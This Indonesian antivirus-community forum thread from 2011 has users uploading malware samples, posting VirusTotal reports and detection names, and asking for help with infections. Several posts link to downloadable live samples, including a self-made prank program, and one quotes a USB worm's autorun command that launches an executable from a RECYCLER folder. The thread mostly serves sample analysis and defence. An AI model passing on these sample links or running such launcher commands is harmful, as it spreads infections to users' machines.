Ditulis oleh: HezekiahSoft pada Juni 27, 2011, 10:11:31 AM
@UP
Wah
Itu pas Ane Analisa itu Ada Beberapa String dan Tehnik seperti virus
Kemungkinan 56 % virus.  :-bd
Ini Hanya Perkiraan
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Juni 28, 2011, 01:39:52 PM
wah itu autorun file tersebut,kemungkinan ini varian baru dari recycle :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: zerox95 pada Juni 28, 2011, 08:23:14 PM
thanx 4 sample
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: tentejsuk pada Juli 03, 2011, 08:55:08 PM
tolongin donk....laptop gw dah di format os nya...smua drive dh di format...instal baru os nya...eh tuh vrus msh aj blik lagi....format virus nya *.Pif
dah pke avira PSS 2011 tetep msh nongkrong...pke AV lokal sekelas Smadav 851 msh juga g bisa di delete tuh virus...yg ampuh pke ap yah bro....
yg tau tolongin gw donk....dah nyerah gw nih...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: tentejsuk pada Juli 03, 2011, 09:06:24 PM
tuh gan contoh file yg sering muncul di smadav...yg lbih parah lgi...ngerubah file exe program mentah...terus menonaktifkan avira PSS, task manager g mau di running (ctrl+alt+del)...hrz lwat smadav baru bisa
plz tolongin donk....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Juli 03, 2011, 09:21:54 PM
Sebenarnya virus ini virus lama.Coba baca ini gan (http://bosgentongs.wordpress.com/2010/08/21/cara-menghentikan-membasmi-dan-menghapus-banjir-virus-folder-shortcut-yuyun-pif-starter/).
Biasanya virus ini sembunyi di CD/DVD koleksi software agan.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: si saprol pada Juli 04, 2011, 02:35:22 PM
bukannya kang yuyun dah kedetec smadav yaak...?
:-\
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Juli 04, 2011, 04:29:41 PM
bukannya kang yuyun dah kedetec smadav yaak...?
:-\
emang mbak yuyun tu dah bisa didetek oleh smadav tapi biasanya karna kesalahan user itu sendiri yang mengakibatkan kompinya masih juga di hinggapi oleh mbak yuyun ini.
salah satu contoh kesalahan user adalah ketika dia menyimpan aplikasi nya dalam bentuk CD tapi dalam keadaan kompinya terinfeksi virus.maka biarpun dia ganti hardisk trus instal ulang tapi sopwer yang di pake adalah sopwer yang udah terkontaminasi virus tadi.
Dan ketika smadav memberi peringatan bahwa aplikasinya mengandung virus mereka memilih untuk abaikan.
kalau dah begitu gimana virusnya nggak balik lagi  8) 8)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Juli 24, 2011, 02:58:40 PM
ini virus bukan ya,soalnya sudah beberapa kali saya upload ke virus total hasilnya nihil,tapi semenjak adanya virus ini kompi saya jadi "berbeda"
seperti office nggak bisa jalan,nggak bisa instal aplikasi
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Juli 24, 2011, 03:49:22 PM
Rekan manggolo, baru saja saya coba dan hasilnya nihil, dia minta help dan diklik help ya gak ada helpnya, dan td saya coba buka Office (Word) bisa saja kok dibuka.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Juli 24, 2011, 03:56:40 PM
Rekan manggolo, baru saja saya coba dan hasilnya nihil, dia minta help dan diklik help ya gak ada helpnya, dan td saya coba buka Office (Word) bisa saja kok dibuka.
Oke terimakasih bung Ryan.saya sendiri juga heran,padahal kemeren itu kompinya sampai tak instal ulang gara -gara mau instal potoshop,corel,dan cad nggak bisa,saya full scan dengan esset hasilnya juga nihil.
ya cuma file startX.exe itu aja yang saya anggap aneh.dirnya ada di C/windows /temp
akhirnya saya pasrah dan inul kompinya  ;D ;D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: bacems tempe pada Juli 26, 2011, 02:00:50 PM
Fake AV....  chekidot!  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Juli 26, 2011, 03:52:50 PM
Terima kasih rekan bacems.
Langsung saya sedot dgn Opera Mini 6 tuk dianalisa, sruuup..., download completed. :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: klasnich pada Juli 27, 2011, 01:01:11 PM
ditunggu lagi hasil analisa-nya bang bkb...  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Juli 28, 2011, 09:31:05 AM
Ya rekan Adi, saya mau ke kampus dulu bentar ada urusan, nanti kita sambung lagi. ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Aufanul-Ichsan pada Juli 28, 2011, 07:07:56 PM
kok di smadav ga ke detect ya ? sementara ane liat pake Virustotal.com http://www.virustotal.com/file-scan/report.html?id=3ea13eb442dc409e446eb41e85f49ddecbe61125656f2faf8470a092c0b379a3-1311853937 disitu 76.7% Terinfeksi Virus!
ane dapet ini dari 4shared dengan nama Credit Card Generator 4.0 tapi ane ubah jadi Sample,kan disitu ada passwordnya,ane klik Password.txt malah keinfeksi,sampe ngeformat Hard Drives,kayaknya di Binder yaa,kalo gak salah ini dibuat pake Virus Maker gitu.bisa tolong analisa?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juli 28, 2011, 08:56:39 PM
kok di smadav ga ke detect ya ? sementara ane liat pake Virustotal.com http://www.virustotal.com/file-scan/report.html?id=3ea13eb442dc409e446eb41e85f49ddecbe61125656f2faf8470a092c0b379a3-1311853937 disitu 76.7% Terinfeksi Virus!
ane dapet ini dari 4shared dengan nama Credit Card Generator 4.0 tapi ane ubah jadi Sample,kan disitu ada passwordnya,ane klik Password.txt malah keinfeksi,sampe ngeformat Hard Drives,kayaknya di Binder yaa,kalo gak salah ini dibuat pake Virus Maker gitu.bisa tolong analisa?
aneh banget neh  :-\
dah coba DL koq pas dah mau selesai balik lagi ke pertama ya  ???
apa tuh virus dah takut duluan ya  ;>
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada Juli 28, 2011, 08:59:31 PM
Kalo mau uplot virus di rar dulu ya...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juli 28, 2011, 09:03:09 PM
Kalo mau uplot virus di rar dulu ya...
resiko karena ga di Rar. or .Zip file
pas ngecek di Quarantine ESET dah terdeteksi sebagai Win32/VB.OVT Trojan  ;>
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Juli 28, 2011, 10:28:54 PM
Bahkan walaupun diRAR/Zip tanpa password tetap saja terdetect dengan DeepScannya.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: dods pada Juli 29, 2011, 06:45:08 AM
Salam kenal semua, mau nyoba upload nih. Udah mulai 1-2 bln yg lalu dan kemarin setelah install ulang masih kena lagi nih. Mudah2an ada yang bisa bantu.....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: payjho pada Juli 29, 2011, 07:07:41 AM
Salam kenal semua, mau nyoba upload nih. Udah mulai 1-2 bln yg lalu dan kemarin setelah install ulang masih kena lagi nih. Mudah2an ada yang bisa bantu.....

ini nama virusnya virut, biasanya dia suka nginfeksi file applikasi (.exe) nah klo diinstall ulang kan yg diformat cma drive C biasanya, trus si virus ini jg nginfeksi file2 di drive lain (D,E, dll)
jdi stelah kompi jalan lgi ya ke infeksi lgi, mkanya sbelum install ulang pastiin dulu klo semua virus udh bersih,

coba pake antivirus lain (kyk kaspersky, eset, norton, norman, MSE) atau bsa jg make tool2 gratis smacam norman malware cleaner, dr. web cure it, comodo cleaning essentials, windows live safety scanner, etc

(http://i51.tinypic.com/24bumif.jpg)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: dods pada Juli 29, 2011, 07:19:51 AM
Thx bro ariesz,  :), iya nih mau install ulang semua di laptop sama desktop dirmh, udah lama ngga update2 antivirus. cuma pake smadav aja. Ini nyoba upload 1 file lagi...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juli 29, 2011, 08:00:59 AM
Thx bro ariesz,  :), iya nih mau install ulang semua di laptop sama desktop dirmh, udah lama ngga update2 antivirus. cuma pake smadav aja. Ini nyoba upload 1 file lagi...
emang ESET keren abis euy  :-X
coba DL tuh sampel virus eh ga tau nya dah masuk Quarantine ESET dan di deteksi sbg Win32/Virut.NBP  ;>
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: kambeeng pada Juli 29, 2011, 11:21:22 AM
Upload Virus Ke Forum emang ada segi positifnya.. cuman ada dampak negatifnya.... dimana .. bandwidth akan terkuras habis.... kecuali kalau server kita dedicated .. kalau shared percuma



Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juli 29, 2011, 11:32:40 AM
Upload Virus Ke Forum emang ada segi positifnya.. cuman ada dampak negatifnya.... dimana .. bandwidth akan terkuras habis.... kecuali kalau server kita dedicated .. kalau shared percuma
jadi solusi bijimane donk bro  :-\ ???
langsung deh confirm ke admin ngatur bagusnya gmn :-[
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: kambeeng pada Juli 29, 2011, 11:36:39 AM
Hosting smadaver dot com ini bukanlkah di dedicated server.... kalau nggak salah..!!
Yang dedicated ada di .. DAXA .. salah satu server dedicated kita .. kenapa tidak di upload ke Sana Saja :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Aufanul-Ichsan pada Juli 29, 2011, 02:44:12 PM
kok di smadav ga ke detect ya ? sementara ane liat pake Virustotal.com http://www.virustotal.com/file-scan/report.html?id=3ea13eb442dc409e446eb41e85f49ddecbe61125656f2faf8470a092c0b379a3-1311853937 disitu 76.7% Terinfeksi Virus!
ane dapet ini dari 4shared dengan nama Credit Card Generator 4.0 tapi ane ubah jadi Sample,kan disitu ada passwordnya,ane klik Password.txt malah keinfeksi,sampe ngeformat Hard Drives,kayaknya di Binder yaa,kalo gak salah ini dibuat pake Virus Maker gitu.bisa tolong analisa?
aneh banget neh  :-\
dah coba DL koq pas dah mau selesai balik lagi ke pertama ya  ???
apa tuh virus dah takut duluan ya  ;>
mungkin gan,takut sama ente kali :P hasilnya gimana ?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juli 29, 2011, 09:09:39 PM
mungkin gan,takut sama ente kali :P hasilnya gimana ?
hasilnya ga sampe kelar2 DL nya tuh virus  >=)
da masuk ke quarantine ESET tuh ada di bawah posting nya
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada Juli 29, 2011, 09:15:23 PM
Upload Virus Ke Forum emang ada segi positifnya.. cuman ada dampak negatifnya.... dimana .. bandwidth akan terkuras habis.... kecuali kalau server kita dedicated .. kalau shared percuma

forum belum pernah down gara2 topik ini.
forum ini juga tertulis unlimited space and bandwidth (walau faktanya tdk begitu)
tp bandwidthnya cukup besar koq.
file2 virus cuman bbrp kb. malah lebih berat attachment gambar.

jadi sebenarnya kurang beralasan klo upload virus ke forum dipermasalahkan.

CMIIW
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Juli 30, 2011, 12:31:29 AM
Yup rekan harboot, dan tak lupa utk file gambar yg gede itu kebanyakan dari web lain sperti tinypic dan sebagainya, saya rasa tidak jadi masalah juga! ;) :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: verbum4it pada Juli 30, 2011, 08:28:18 PM
Sality memang cukup mengganggu. Komputer saya sudah saya scan menggunakan smadav tetapi versi terbaru tetapi koch kenapa masih selalu ada. Mungkin ada member yang dapat memberi masukan?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada Juli 30, 2011, 08:34:32 PM
Smadav hanya khusus menangani virus lokal. Untuk masalah sality silahkan baca2 di http://smadaver.com/konsultasi-virus/sality-kuku/ ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Deny MiniDwarf pada Juli 30, 2011, 09:02:53 PM
kok di smadav ga ke detect ya ? sementara ane liat pake Virustotal.com http://www.virustotal.com/file-scan/report.html?id=3ea13eb442dc409e446eb41e85f49ddecbe61125656f2faf8470a092c0b379a3-1311853937 disitu 76.7% Terinfeksi Virus!
ane dapet ini dari 4shared dengan nama Credit Card Generator 4.0 tapi ane ubah jadi Sample,kan disitu ada passwordnya,ane klik Password.txt malah keinfeksi,sampe ngeformat Hard Drives,kayaknya di Binder yaa,kalo gak salah ini dibuat pake Virus Maker gitu.bisa tolong analisa?
udah coba DL pake IDM..tapi pas dah mau di buka langsung kedetect ma avg sebagai trojan..:D

(http://i56.tinypic.com/2ltobut.jpg)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Aufanul-Ichsan pada Juli 31, 2011, 02:53:25 PM
Kudu Download AV Cadangan nih,itu agan ^ pake AVG yang free?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: HezekiahSoft pada Agustus 08, 2011, 05:44:36 PM
Aku mau sumbang Virus nih
Silahkan
http://www.mediafire.com/?238b3dh9yyid53i
Ini asli Buatanku
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Agustus 08, 2011, 06:40:02 PM
Aku mau sumbang Virus nih
Silahkan
http://www.mediafire.com/?238b3dh9yyid53i
Ini asli Buatanku
kalau boleh kasih bocorannya dong gan...
cara kerja virus ini....
btw kok pake nama SMΔRTP.exe ada alasan tertentu apa asal pilih nama saja
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Agustus 08, 2011, 08:17:11 PM
Aku mau sumbang Virus nih
Silahkan
http://www.mediafire.com/?238b3dh9yyid53i
Ini asli Buatanku
sip gw coba DL ya :D
kalau boleh kasih bocorannya dong gan...
cara kerja virus ini....
btw kok pake nama SMΔRTP.exe ada alasan tertentu apa asal pilih nama saja
ia juga ya kenapa pake nama mirip2 smadav ya  :-\
apa ada maksud tertentu dari neh virus  ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: bacems tempe pada Agustus 09, 2011, 10:50:32 AM
Warcraft III Fake  :P

pass: 1234
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: bacems tempe pada Agustus 09, 2011, 10:52:36 AM
Aku mau sumbang Virus nih
Silahkan
http://www.mediafire.com/?238b3dh9yyid53i
Ini asli Buatanku
kalau boleh kasih bocorannya dong gan...
cara kerja virus ini....
btw kok pake nama SMΔRTP.exe ada alasan tertentu apa asal pilih nama saja


sebagai orang awam, Teknik social engineering menurut gw sampai sekarang masih termasuk teknik yg tergolong jahat,karna masih saja bisa mengelabui user, termasuk pemilihan nama SMARTP
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Agustus 09, 2011, 01:21:32 PM
Aku mau sumbang Virus nih
Silahkan
http://www.mediafire.com/?238b3dh9yyid53i
Ini asli Buatanku

pas di jalankan, muncul message spt ini...
(http://i51.tinypic.com/1zldph2.jpg)

trus, dia nahan gak bisa di close dgn klik tombol X ...

btw, maksudnya apa bro ada pesan BERANI MATIIN GUE Komputer Lu GUE SANTET.wkwkwkkwk  :D

klo ane boleh bilang ini program iseng doang yah... :)
coz, tidak ada code utk penggandaan diri...dia cuma pake 1 form dan 1 control timer dgn interval 1 milidetik, yg dipake pada rutin kode MsgBox "hahahahahaha" cmiiw
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Agustus 10, 2011, 07:22:12 PM
@Manggolo dan Phamentar
maksud dari virus ini adalah utk mengelabui USER
@The Gugel
Maksud dari tulisan ini "BERANI MATIIN GUE Komputer Lu GUE SANTET.wkwkwkkwk" adalah untuk MENAKUTI USER.
He4x iya saya Cuma bisa Tehnik itu.
Nih ada yang Lebih keren dan Lucu
http://www.mediafire.com/?99578dnssvs3o8w
http://www.mediafire.com/?qwd2bhbp5r5q1by  (Fake Cendol ForSMAD)
Silahkan dicoba  :-bd
wkwkwkkwkwkw  =)) =)) =))
kirain apa coba  ;D
tapi selagi neh bukan share tentang pembuatan virus lom ada masalah karena di RULES FORSMAD dilarang tentang pembuatan virus loh :D
coba di liat lagi Rules nya :
http://smadaver.com/peraturan-63/peraturan-forsmad-(forum-smadav)/msg173239/#new
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Exsza pada Agustus 12, 2011, 03:05:19 PM
alamakk virusnya ngeri banget ,wkwkwkkw
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: musniansyah pada Agustus 12, 2011, 03:18:49 PM
Gan....bantui ane, ada seorang cewek. tau beneran tuch cewek apa b***  :D.....kirimin ane file ginian ( ane lampirin )

Mohon bantuannya agan_agan sekalian... ^:)^
karena udah ane klick dan filenya menghilang...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Exsza pada Agustus 13, 2011, 05:02:10 PM
Gan....bantui ane, ada seorang cewek. tau beneran tuch cewek apa b***  :D.....kirimin ane file ginian ( ane lampirin )

Mohon bantuannya agan_agan sekalian... ^:)^
karena udah ane klick dan filenya menghilang...

cek ya http://www.virustotal.com/file-scan/report.html?id=7ea2f728881d56aeea83642fe8105928a98b86af2d9724ef525de3b79c5c1a18-1313229434
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada Agustus 15, 2011, 03:30:46 PM
Dapat dari facebook..
Sepertinya nyebar lewat aplikasi..

Kaspersky : Trojan.Win32.Jorik.IRCbot.avs
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Agustus 15, 2011, 03:50:02 PM
Dapat dari facebook..
Sepertinya nyebar lewat aplikasi..

Kaspersky : Trojan.Win32.Jorik.IRCbot.avs

Malwarebytes' Anti Malware : Rootkit.0Access.XGen
Sorry but you are not allowed to view spoiler contents.

Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Deny MiniDwarf pada Agustus 16, 2011, 08:13:28 PM
Dapat dari facebook..
Sepertinya nyebar lewat aplikasi..

Kaspersky : Trojan.Win32.Jorik.IRCbot.avs
lum sempat coba...keburu FF ngfreeze ketika mau dl dan ngerestart sendiri
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Captain_aslam pada Agustus 18, 2011, 10:13:35 PM
Maaf , tapi mo tanya, \m/
flashdisk ku dipinjem sama kakakku buat ngeprint di foto copy  kalo gak salah :-\
terus aku colok di laptop, folder2 di root fd kecuali fldr smad-lock jadi shortcut semua >=) :'( di scan pke kaspersky gak ke detect :'(
virusnya di upload di upload virus smadav, di winrar keliatan autorun.inf sama recyclernya :-\ nih ku attach virusnya juga disini rar
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada Agustus 18, 2011, 10:33:48 PM
Langsung ketangkep sama ESET sewaktu download sebagai Win32/Darkbot.D :D
Pict:
Sorry but you are not allowed to view spoiler contents.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Captain_aslam pada Agustus 19, 2011, 06:15:07 AM
ouch :D tapi napa FlashDisk di scan pake Kaspersky Antivirus 6.0 for Workstations gak ke detek :-\
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Agustus 19, 2011, 07:47:24 AM
Maaf , tapi mo tanya, \m/
flashdisk ku dipinjem sama kakakku buat ngeprint di foto copy  kalo gak salah :-\
terus aku colok di laptop, folder2 di root fd kecuali fldr smad-lock jadi shortcut semua >=) :'( di scan pke kaspersky gak ke detect :'(
virusnya di upload di upload virus smadav, di winrar keliatan autorun.inf sama recyclernya :-\ nih ku attach virusnya juga disini rar
C:\WINDOWS\system32\cmd.exe  A / c   " s t a r t   % c d % R E C Y C L E R \ b c d 8 f 4 6 4 . e x e
Result = Virus One (Abjad).
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: payjho pada Agustus 19, 2011, 07:59:50 AM
Maaf , tapi mo tanya, \m/
flashdisk ku dipinjem sama kakakku buat ngeprint di foto copy  kalo gak salah :-\
terus aku colok di laptop, folder2 di root fd kecuali fldr smad-lock jadi shortcut semua >=) :'( di scan pke kaspersky gak ke detect :'(
virusnya di upload di upload virus smadav, di winrar keliatan autorun.inf sama recyclernya :-\ nih ku attach virusnya juga disini rar

utk file shortcut exploit (.lnk) kaspersky emang ga ngedetect sbg virus :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Alif de Hunter! pada Agustus 20, 2011, 03:55:45 PM


Terinfeksi Dan langsung Di detect Sama AVAST! Internet Security..

Avast:Win32:Downloader-JPS[Trj]

[Yang Poto FB ini ya] :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Alif de Hunter! pada Agustus 20, 2011, 03:57:07 PM
Maaf , tapi mo tanya, \m/
flashdisk ku dipinjem sama kakakku buat ngeprint di foto copy  kalo gak salah :-\
terus aku colok di laptop, folder2 di root fd kecuali fldr smad-lock jadi shortcut semua >=) :'( di scan pke kaspersky gak ke detect :'(
virusnya di upload di upload virus smadav, di winrar keliatan autorun.inf sama recyclernya :-\ nih ku attach virusnya juga disini rar

utk file shortcut exploit (.lnk) kaspersky emang ga ngedetect sbg virus :D

Benar2 Mastah Kaspersky ..  :)  :-X
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MacGyver_C2694 pada September 05, 2011, 12:38:22 AM
lagi pake AV avira ga satupun terdeteksi padahal sudah diset High  :D

virustotal
readme (http://www.virustotal.com/file-scan/report.html?id=478b6e8834685d8784f4a79d8aea2df73708054e984d5251ba396bea57d33132-1315155354)
contacts (http://www.virustotal.com/file-scan/report.html?id=3076c741cea82bb7a8df321cd5a8f0871c5140bc63d5af12f57c0349f8c0abb0-1315156042)
edit
readme.exe sudah terdeteksi oleh AVIRA  :P
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: zeroFINGER pada September 06, 2011, 09:46:14 AM
siang para agan semua...
perlu bantuan agan2 semua...
ada virus ovxoirhb.exe di compi saya,
bercokolnya nih virus di startup, pakai smadav blm ke detek virus... tp pakai pc**v ke detek ramnit.m.dropper
filenya sdh bs di hilangin waktu clean di windows safemode.... tp pas masuk windows normal muncul lg virusnya di startup
dan mulai lg nih virus beroprasi....
tlg dibantu cara bunuh ni virus....
gw dah stress .... gan ~x( ~x( ~x(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada September 06, 2011, 09:59:39 AM
siang para agan semua...
perlu bantuan agan2 semua...
ada virus ovxoirhb.exe di compi saya,
bercokolnya nih virus di startup, pakai smadav blm ke detek virus... tp pakai pc**v ke detek ramnit.m.dropper
filenya sdh bs di hilangin waktu clean di windows safemode.... tp pas masuk windows normal muncul lg virusnya di startup
dan mulai lg nih virus beroprasi....
tlg dibantu cara bunuh ni virus....
gw dah stress .... gan ~x( ~x( ~x(


Nggak diupload sampel virusnya?? Maaf salah kamar, ni topik buat upload virus. Saran saya sementara basmi pake AV impor :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rh354 pada September 06, 2011, 04:04:16 PM
siang para agan semua...
perlu bantuan agan2 semua...
ada virus ovxoirhb.exe di compi saya,
bercokolnya nih virus di startup, pakai smadav blm ke detek virus... tp pakai pc**v ke detek ramnit.m.dropper
filenya sdh bs di hilangin waktu clean di windows safemode.... tp pas masuk windows normal muncul lg virusnya di startup
dan mulai lg nih virus beroprasi....
tlg dibantu cara bunuh ni virus....
gw dah stress .... gan ~x( ~x( ~x(

bisa upload kemari sampelnya bro
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada September 11, 2011, 06:36:30 AM
sebenarnya mau upload virus nya tapi ga tau yg mana neh  :o
gw ngasih penampakan nya aja ya  :-[
spa tau ada member mengalami hal yang sama  :)
jadi tulisan aneh
Sorry but you are not allowed to view spoiler contents.
neh setelah Scan pake salah 1 AV handal  ;)
Sorry but you are not allowed to view spoiler contents.
scan pake Smadav lupa ngambil SS  ^:)^
tapi ada 1 file yg smadav detec sedang hid, tapi ga bisa di unhide  ^-^

Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rh354 pada September 11, 2011, 01:11:00 PM
coba ambil filenya lewat ubuntu
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada September 11, 2011, 04:17:02 PM
coba ambil filenya lewat ubuntu
dah terlanjur gw format dari ubuntu bro  =)) =))
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Captain_aslam pada September 18, 2011, 08:21:34 PM
Mohon maaf tapi mau nanya... kok chrome.exe (Google Chrome) sama shortcut nya kok kedeteksi virus New Heur level 9?
screenshot
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada September 18, 2011, 09:59:44 PM
Mohon maaf tapi mau nanya... kok chrome.exe (Google Chrome) sama shortcut nya kok kedeteksi virus New Heur level 9?
screenshot
masa seh sampe sekarang keq gitu juga  :-\
perasaan kemaren dah di fix tuh yg instaler online chrome ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: bacems tempe pada Oktober 04, 2011, 11:46:07 AM
Virus Facebook varian baru nih cuy! silahkan download  :D :D

password: 12345

VT: http://www.virustotal.com/file-scan/report.html?id=71c07527fb6b3feb0f4ff0ad703e24a5f03707ea821b19948c0bc689b13f45a3-1317703076
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: alfatta pada Oktober 06, 2011, 04:17:45 AM
kk aq udah pake smadav yang terbaru tuh yg 8.7 tapi kan komputer ku ada virus disable regedit sama task manager, awalnya sih bisa tuh dari scan registry tapi selese scan langsung kedisable lagi. dan komputer saya aneh ga bisa dipasang antivirus lain slain smadav. dan koneksi internet saya juga kayaknya keserang deh. pliis bantu y kak bgaimana solusinya. Sad Sad
 Smiley Smiley
Remove message
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cay_rob pada Oktober 07, 2011, 11:06:59 AM
nod32---> object::http://w.v7x.info/img.jpg (http://w.v7x.info/img.jpg) size::51712 reason::win32/lamechi.i

ta coba tutup no32 langsung terserang file ini
http://www.speedyshare.com/files/30634277/Real.rar (http://www.speedyshare.com/files/30634277/Real.rar)

pertanyaanya:
1. itu virus melalui jaringan lan ya?
2. kl masih terdetect di nod32---> object::http://w.v7x.info/img.jpg (http://w.v7x.info/img.jpg) size::51712 reason::win32/lamechi.i  berulang2 ke karatin trus. apa sudah terkena komp nya?
3. cara memusnahkannya bagaimana kk, thx


setelah disable nod32::
http://www.speedyshare.com/files/30634321/setelah_nod_mati.log (http://www.speedyshare.com/files/30634321/setelah_nod_mati.log)
http://www.speedyshare.com/files/30634321/setelah_nod_mati.log (http://www.speedyshare.com/files/30634321/setelah_nod_mati.log)


sebelum disable no32
http://www.speedyshare.com/files/30634350/hijackthis.log (http://www.speedyshare.com/files/30634350/hijackthis.log)
http://www.speedyshare.com/files/30634351/ss.JPG (http://www.speedyshare.com/files/30634351/ss.JPG)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rh354 pada Oktober 10, 2011, 02:09:44 PM
nod32---> object::http://w.v7x.info/img.jpg (http://w.v7x.info/img.jpg) size::51712 reason::win32/lamechi.i

ta coba tutup no32 langsung terserang file ini
http://www.speedyshare.com/files/30634277/Real.rar (http://www.speedyshare.com/files/30634277/Real.rar)

pertanyaanya:
1. itu virus melalui jaringan lan ya?
2. kl masih terdetect di nod32---> object::http://w.v7x.info/img.jpg (http://w.v7x.info/img.jpg) size::51712 reason::win32/lamechi.i  berulang2 ke karatin trus. apa sudah terkena komp nya?
3. cara memusnahkannya bagaimana kk, thx


setelah disable nod32::
http://www.speedyshare.com/files/30634321/setelah_nod_mati.log (http://www.speedyshare.com/files/30634321/setelah_nod_mati.log)
http://www.speedyshare.com/files/30634321/setelah_nod_mati.log (http://www.speedyshare.com/files/30634321/setelah_nod_mati.log)


sebelum disable no32
http://www.speedyshare.com/files/30634350/hijackthis.log (http://www.speedyshare.com/files/30634350/hijackthis.log)
http://www.speedyshare.com/files/30634351/ss.JPG (http://www.speedyshare.com/files/30634351/ss.JPG)
berulang ulangnya berapa kali...

itu kejadian kapan trus itu setelah di deep freeze ato sebelum di deep freeze..hal ini penting soalnya biar tau letak kesalahannya dimana..mana tau terinfeksi sebelum di DF :P

esetnya udah disetting seperti ini
http://kb.eset.co.id/index.php?sid=171505&lang=id&action=artikel&cat=2&id=7&artlang=id

klo warning gitu berarti ada yg mo akses ke url itu tp di block ama ESET nya(ntah sengaja terklik atopun tidak disengaja) dengan laporan seperti itu..klo berulang2 wajar soalnya web dan di dalam web itu ada beberapa component, nah component itu (ex : favicon) jg kliatan warningnya. klo di block gitu belum keinfect..

btw bisa minta sysinspectornya, cek kemari cara pakainya

http://kb.eset.co.id/index.php?action=artikel&cat=3&id=28&artlang=id
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: barubelajar pada Oktober 11, 2011, 06:37:04 PM
gan coba tulungin cek file yg ini, kompi ga bisa akses situs antivirus luar lg  :'( :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: diannofa pada Oktober 11, 2011, 07:04:19 PM
tolongin dong
leptop Q bervirus :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada Oktober 11, 2011, 07:35:56 PM
tolongin dong
leptop Q bervirus :'(


Coba baca2 topik yg ada disini sapa tau nemu solusinya. Kalo blm ketemu baru buat topik sendiri dan dijelaskan detailnya :)



